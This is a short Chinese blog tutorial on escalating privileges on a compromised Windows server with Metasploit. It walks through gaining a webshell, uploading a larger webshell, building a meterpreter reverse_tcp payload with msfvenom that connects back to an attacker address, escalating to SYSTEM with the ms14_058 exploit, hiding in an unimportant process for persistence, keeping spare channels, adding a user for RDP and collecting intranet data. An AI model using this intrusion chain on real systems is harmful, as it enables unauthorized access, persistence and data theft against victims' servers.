MSF进行windows提权

主要思路

1.拿到webshell
2.上传大马
3.利用meterpreter模块生成payload
4.本地进行监听
5.进行提权
6.进行维权
7.生成新用户,连接3389

一、本地监听端口

①.生成payload
msfvenom -p windows/meterpreter/reverse_tcp lhost= x.x.x.x lport=xxx -f exe >xxxx/123.exe

②.上传123.exe
这里直接在大马上进行上传运行即可。(随便找一个有执行权限的目录即可)

③.msf本地监听端口,并运行123.exe

在这里插入图片描述在这里插入图片描述拿到NETWORK SERVICE权限,这个是windows内置用户大概权限跟user差不多。

在这里插入图片描述

④.进行权限提升
我们这里利用ms14_058进行提权,可以影响win server 2008 r2一下的版本

在这里插入图片描述

在这里插入图片描述

提权到system用户

在这里插入图片描述

⑤.写入进程,进行维权。

在这里插入图片描述


注意点:
1.写入进程写在不重要的进程中
2.多准备几条通道进行备用

⑥.进入shell进行用户添加,进行内网资料收集

相关文章

Windows2012R2备用域控搭建 前置操作 域控主域控的主dns:自...
主域控角色迁移和夺取(转载) 转载自:http://yupeizhi.blo...
Windows2012R2 NTP时间同步 Windows2012R2里没有了internet时...
Windows注册表操作基础代码 Windows下对注册表进行操作使用的...
黑客常用WinAPI函数整理之前的博客写了很多关于Windows编程的...
一个简单的Windows Socket可复用框架说起网络编程,无非是建...